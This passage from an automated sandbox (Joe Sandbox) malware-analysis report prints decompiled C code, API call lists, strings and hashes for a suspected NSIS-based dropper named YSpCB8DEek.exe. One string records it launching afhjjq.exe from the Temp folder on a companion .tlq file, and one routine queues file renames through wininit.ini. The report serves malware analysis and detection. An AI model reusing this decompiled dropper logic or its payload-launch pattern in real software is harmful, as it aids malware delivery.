                            									if((_t247 & 0x00000010) == 0) {
                            										if((_t247 & 0x00000040) == 0) {
                            											_t248 = _t247 ^ 0x00000001;
                            										} else {
                            											_t254 = _t247 ^ 0x00000080;
                            											if(_t254 >= 0) {
                            												_t248 = _t254 & 0x000000fe;
                            											} else {
                            												_t248 = _t254 | 0x00000001;
                            											}
                            										}
                            										 *_t301 = _t248;
                            										E0040117D(_t295);
                            										_a12 = _t295 + 1;
                            										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                            										_a8 = 0x40f;
                            									}
                            								}
                            								goto L41;
                            							}
                            							_t301 = _a16;
                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                            								goto L41;
                            							}
                            							goto L33;
                            						} else {
                            							goto L48;
                            						}
                            					} else {
                            						L48:
                            						if(_a8 != 0x111) {
                            							L56:
                            							if(_a8 == 0x200) {
                            								SendMessageW(_v8, 0x200, 0, 0);
                            							}
                            							if(_a8 == 0x40b) {
                            								_t225 =  *0x42372c;
                            								if(_t225 != 0) {
                            									ImageList_Destroy(_t225);
                            								}
                            								_t226 =  *0x423740;
                            								if(_t226 != 0) {
                            									GlobalFree(_t226);
                            								}
                            								 *0x42372c = 0;
                            								 *0x423740 = 0;
                            								 *0x42a2c0 = 0;
                            							}
                            							if(_a8 != 0x40f) {
                            								L90:
                            								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                            									ShowWindow(_v8, _t324);
                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                            								}
                            								goto L93;
                            							} else {
                            								E004011EF(_t301, 0, 0);
                            								_t198 = _a12;
                            								if(_t198 != 0) {
                            									if(_t198 != 0xffffffff) {
                            										_t198 = _t198 - 1;
                            									}
                            									_push(_t198);
                            									_push(8);
                            									E00404FFF();
                            								}
                            								if(_a16 == 0) {
                            									L75:
                            									E004011EF(_t301, 0, 0);
                            									_v36 =  *0x423740;
                            									_t201 =  *0x42a288;
                            									_v64 = 0xf030;
                            									_v24 = 0;
                            									if( *0x42a28c <= 0) {
                            										L86:
                            										if( *0x42a31e == 0x400) {
                            											InvalidateRect(_v8, 0, 1);
                            										}
                            										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                            											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                            										}
                            										goto L90;
                            									}
                            									_t292 = _t201 + 8;
                            									do {
                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                            										if(_t207 != 0) {
                            											_t303 =  *_t292;
                            											_v72 = _t207;
                            											_v76 = 8;
                            											if((_t303 & 0x00000001) != 0) {
                            												_v76 = 9;
                            												_v60 =  &(_t292[4]);
                            												_t292[0] = _t292[0] & 0x000000fe;
                            											}
                            											if((_t303 & 0x00000040) == 0) {
                            												_t211 = (_t303 & 0x00000001) + 1;
                            												if((_t303 & 0x00000010) != 0) {
                            													_t211 = _t211 + 3;
                            												}
                            											} else {
                            												_t211 = 3;
                            											}
                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                            										}
                            										_v24 = _v24 + 1;
                            										_t292 =  &(_t292[0x206]);
                            									} while (_v24 <  *0x42a28c);
                            									goto L86;
                            								} else {
                            									_t293 = E004012E2( *0x423740);
                            									E00401299(_t293);
                            									_t222 = 0;
                            									_t301 = 0;
                            									if(_t293 <= 0) {
                            										L74:
                            										SendMessageW(_v12, 0x14e, _t301, 0);
                            										_a16 = _t293;
                            										_a8 = 0x420;
                            										goto L75;
                            									} else {
                            										goto L71;
                            									}
                            									do {
                            										L71:
                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                            											_t301 = _t301 + 1;
                            										}
                            										_t222 = _t222 + 1;
                            									} while (_t222 < _t293);
                            									goto L74;
                            								}
                            							}
                            						}
                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                            							goto L93;
                            						} else {
                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                            							if(_t232 == 0xffffffff) {
                            								goto L93;
                            							}
                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                            								_t294 = 0x20;
                            							}
                            							E00401299(_t294);
                            							SendMessageW(_a4, 0x420, 0, _t294);
                            							_a12 = _a12 | 0xffffffff;
                            							_a16 = 0;
                            							_a8 = 0x40f;
                            							goto L56;
                            						}
                            					}
                            				} else {
                            					_v36 = 0;
                            					_v20 = 2;
                            					 *0x42a2c0 = _t291;
                            					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                            					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                            					 *0x423734 =  *0x423734 | 0xffffffff;
                            					_t297 = _t258;
                            					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                            					 *0x42372c = _t260;
                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                            					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                            					}
                            					DeleteObject(_t297);
                            					_t298 = 0;
                            					do {
                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                            							if(_t298 != 0x20) {
                            								_v20 = 0;
                            							}
                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                            						}
                            						_t298 = _t298 + 1;
                            					} while (_t298 < 0x21);
                            					_t299 = _a16;
                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                            					_push(0x15);
                            					E004045C4(_a4);
                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                            					_push(0x16);
                            					E004045C4(_a4);
                            					_t300 = 0;
                            					_v16 = 0;
                            					if( *0x42a28c <= 0) {
                            						L19:
                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                            						goto L20;
                            					} else {
                            						_t319 = _v24 + 8;
                            						_v32 = _t319;
                            						do {
                            							_t278 =  &(_t319[0x10]);
                            							if( *_t278 != 0) {
                            								_v64 = _t278;
                            								_t279 =  *_t319;
                            								_v88 = _v16;
                            								_t311 = 0x20;
                            								_v84 = 0xffff0002;
                            								_v80 = 0xd;
                            								_v68 = _t311;
                            								_v44 = _t300;
                            								_v72 = _t279 & _t311;
                            								if((_t279 & 0x00000002) == 0) {
                            									if((_t279 & 0x00000004) == 0) {
                            										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                            									} else {
                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                            									}
                            								} else {
                            									_v80 = 0x4d;
                            									_v48 = 1;
                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                            									_v36 = 1;
                            									 *( *0x423740 + _t300 * 4) = _t284;
                            									_v16 =  *( *0x423740 + _t300 * 4);
                            								}
                            							}
                            							_t300 = _t300 + 1;
                            							_t319 =  &(_v32[0x818]);
                            							_v32 = _t319;
                            						} while (_t300 <  *0x42a28c);
                            						if(_v36 != 0) {
                            							L20:
                            							if(_v20 != 0) {
                            								E004045F9(_v8);
                            								goto L23;
                            							} else {
                            								ShowWindow(_v12, 5);
                            								E004045F9(_v12);
                            								L93:
                            								return E0040462B(_a8, _a12, _a16);
                            							}
                            						}
                            						goto L19;
                            					}
                            				}
                            			}

                            APIs
                            • GetDlgItem.USER32 ref: 00405049
                            • GetDlgItem.USER32 ref: 00405054
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                            • LoadImageW.USER32 ref: 004050B5
                            • SetWindowLongW.USER32 ref: 004050CE
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                            • DeleteObject.GDI32(00000000), ref: 0040512B
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                            • SetWindowLongW.USER32 ref: 0040527D
                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                            • GlobalFree.KERNEL32 ref: 0040546B
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                            • ShowWindow.USER32(?,00000000), ref: 00405615
                            • GetDlgItem.USER32 ref: 00405620
                            • ShowWindow.USER32(00000000), ref: 00405627
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                            				intOrPtr _v8;
                            				int _v12;
                            				void* _v16;
                            				struct HWND__* _t56;
                            				signed int _t75;
                            				signed short* _t76;
                            				signed short* _t78;
                            				long _t92;
                            				int _t103;
                            				signed int _t110;
                            				intOrPtr _t113;
                            				WCHAR* _t114;
                            				signed int* _t116;
                            				WCHAR* _t117;
                            				struct HWND__* _t118;
                            
                            				if(_a8 != 0x110) {
                            					if(_a8 != 0x111) {
                            						L13:
                            						if(_a8 != 0x4e) {
                            							if(_a8 == 0x40b) {
                            								 *0x421714 =  *0x421714 + 1;
                            							}
                            							L27:
                            							_t114 = _a16;
                            							L28:
                            							return E0040462B(_a8, _a12, _t114);
                            						}
                            						_t56 = GetDlgItem(_a4, 0x3e8);
                            						_t114 = _a16;
                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                            							_v12 = _t103;
                            							_v16 = _t113;
                            							_v8 = 0x428200;
                            							if(_t103 - _t113 < 0x800) {
                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                            								SetCursor(LoadCursorW(0, 0x7f02));
                            								_push(1);
                            								E00404A32(_a4, _v8);
                            								SetCursor(LoadCursorW(0, 0x7f00));
                            								_t114 = _a16;
                            							}
                            						}
                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                            							goto L28;
                            						} else {
                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                            								SendMessageW( *0x42a268, 0x111, 1, 0);
                            							}
                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                            								SendMessageW( *0x42a268, 0x10, 0, 0);
                            							}
                            							return 1;
                            						}
                            					}
                            					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                            						goto L27;
                            					} else {
                            						_t116 =  *0x422720 + 0x14;
                            						if(( *_t116 & 0x00000020) == 0) {
                            							goto L27;
                            						}
                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                            						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                            						E00404A0E();
                            						goto L13;
                            					}
                            				}
                            				_t117 = _a16;
                            				_t75 =  *(_t117 + 0x30);
                            				if(_t75 < 0) {
                            					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                            				}
                            				_t76 =  *0x42a298 + _t75 * 2;
                            				_t110 =  *_t76 & 0x0000ffff;
                            				_a8 = _t110;
                            				_t78 =  &(_t76[1]);
                            				_a16 = _t78;
                            				_v16 = _t78;
                            				_v12 = 0;
                            				_v8 = E00404734;
                            				if(_t110 != 2) {
                            					_v8 = E004046FA;
                            				}
                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                            				_push(0x22);
                            				E004045C4(_a4);
                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                            				_push(0x23);
                            				E004045C4(_a4);
                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                            				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                            				_t118 = GetDlgItem(_a4, 0x3e8);
                            				E004045F9(_t118);
                            				SendMessageW(_t118, 0x45b, 1, 0);
                            				_t92 =  *( *0x42a270 + 0x68);
                            				if(_t92 < 0) {
                            					_t92 = GetSysColor( ~_t92);
                            				}
                            				SendMessageW(_t118, 0x443, 0, _t92);
                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                            				 *0x421714 = 0;
                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                            				 *0x421714 = 0;
                            				return 0;
                            			}

                            APIs
                            • CheckDlgButton.USER32 ref: 00404821
                            • GetDlgItem.USER32 ref: 00404835
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                            • GetSysColor.USER32(?), ref: 00404863
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                            • lstrlenW.KERNEL32(?), ref: 00404884
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                            • GetDlgItem.USER32 ref: 004048FF
                            • SendMessageW.USER32(00000000), ref: 00404906
                            • GetDlgItem.USER32 ref: 00404931
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                            • SetCursor.USER32(00000000), ref: 00404985
                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                            • SetCursor.USER32(00000000), ref: 004049A1
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                            Strings
                            • "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq, xrefs: 00404960
                            • N, xrefs: 0040491F
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$N
                            • API String ID: 3103080414-3937016478
                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004062AE(void* __ecx) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				long _t12;
                            				long _t24;
                            				char* _t31;
                            				int _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				long _t42;
                            				WCHAR* _t44;
                            				void* _t46;
                            				void* _t48;
                            				void* _t49;
                            				void* _t52;
                            				void* _t53;
                            
                            				_t38 = __ecx;
                            				_t44 =  *(_t52 + 0x14);
                            				 *0x426de8 = 0x55004e;
                            				 *0x426dec = 0x4c;
                            				if(_t44 == 0) {
                            					L3:
                            					_t2 = _t52 + 0x1c; // 0x4275e8
                            					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                            					if(_t12 != 0 && _t12 <= 0x400) {
                            						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                            						_t53 = _t52 + 0x10;
                            						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                            						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                            						_t48 = _t12;
                            						 *(_t53 + 0x18) = _t48;
                            						if(_t48 != 0xffffffff) {
                            							_t42 = GetFileSize(_t48, 0);
                            							_t6 = _t37 + 0xa; // 0xa
                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                            							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                            								L18:
                            								return CloseHandle(_t48);
                            							} else {
                            								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                            									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                            									if(_t49 == 0) {
                            										_t48 =  *(_t53 + 0x18);
                            										L16:
                            										_t24 = _t42;
                            										L17:
                            										E00406113(_t24 + _t46, 0x4269e8, _t37);
                            										SetFilePointer(_t48, 0, 0, 0);
                            										E0040620A(_t48, _t46, _t42 + _t37);
                            										GlobalFree(_t46);
                            										goto L18;
                            									}
                            									_t39 = _t46 + _t42;
                            									_t31 = _t39 + _t37;
                            									while(_t39 > _t49) {
                            										 *_t31 =  *_t39;
                            										_t31 = _t31 - 1;
                            										_t39 = _t39 - 1;
                            									}
                            									_t24 = _t49 - _t46 + 1;
                            									_t48 =  *(_t53 + 0x18);
                            									goto L17;
                            								}
                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                            								_t42 = _t42 + 0xa;
                            								goto L16;
                            							}
                            						}
                            					}
                            				} else {
                            					CloseHandle(E00406158(_t44, 0, 1));
                            					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                            					if(_t12 != 0 && _t12 <= 0x400) {
                            						goto L3;
                            					}
                            				}
                            				return _t12;
                            			}

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                            • wsprintfA.USER32 ref: 0040632D
                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                            • GlobalFree.KERNEL32 ref: 00406416
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                            • API String ID: 2171350718-2295842750
                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                            				struct tagLOGBRUSH _v16;
                            				struct tagRECT _v32;
                            				struct tagPAINTSTRUCT _v96;
                            				struct HDC__* _t70;
                            				struct HBRUSH__* _t87;
                            				struct HFONT__* _t94;
                            				long _t102;
                            				signed int _t126;
                            				struct HDC__* _t128;
                            				intOrPtr _t130;
                            
                            				if(_a8 == 0xf) {
                            					_t130 =  *0x42a270;
                            					_t70 = BeginPaint(_a4,  &_v96);
                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                            					_a8 = _t70;
                            					GetClientRect(_a4,  &_v32);
                            					_t126 = _v32.bottom;
                            					_v32.bottom = _v32.bottom & 0x00000000;
                            					while(_v32.top < _t126) {
                            						_a12 = _t126 - _v32.top;
                            						asm("cdq");
                            						asm("cdq");
                            						asm("cdq");
                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                            						_t87 = CreateBrushIndirect( &_v16);
                            						_v32.bottom = _v32.bottom + 4;
                            						_a16 = _t87;
                            						FillRect(_a8,  &_v32, _t87);
                            						DeleteObject(_a16);
                            						_v32.top = _v32.top + 4;
                            					}
                            					if( *(_t130 + 0x58) != 0xffffffff) {
                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                            						_a16 = _t94;
                            						if(_t94 != 0) {
                            							_t128 = _a8;
                            							_v32.left = 0x10;
                            							_v32.top = 8;
                            							SetBkMode(_t128, 1);
                            							SetTextColor(_t128,  *(_t130 + 0x58));
                            							_a8 = SelectObject(_t128, _a16);
                            							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                            							SelectObject(_t128, _a8);
                            							DeleteObject(_a16);
                            						}
                            					}
                            					EndPaint(_a4,  &_v96);
                            					return 0;
                            				}
                            				_t102 = _a16;
                            				if(_a8 == 0x46) {
                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                            					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                            				}
                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                            			}

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32 ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32 ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
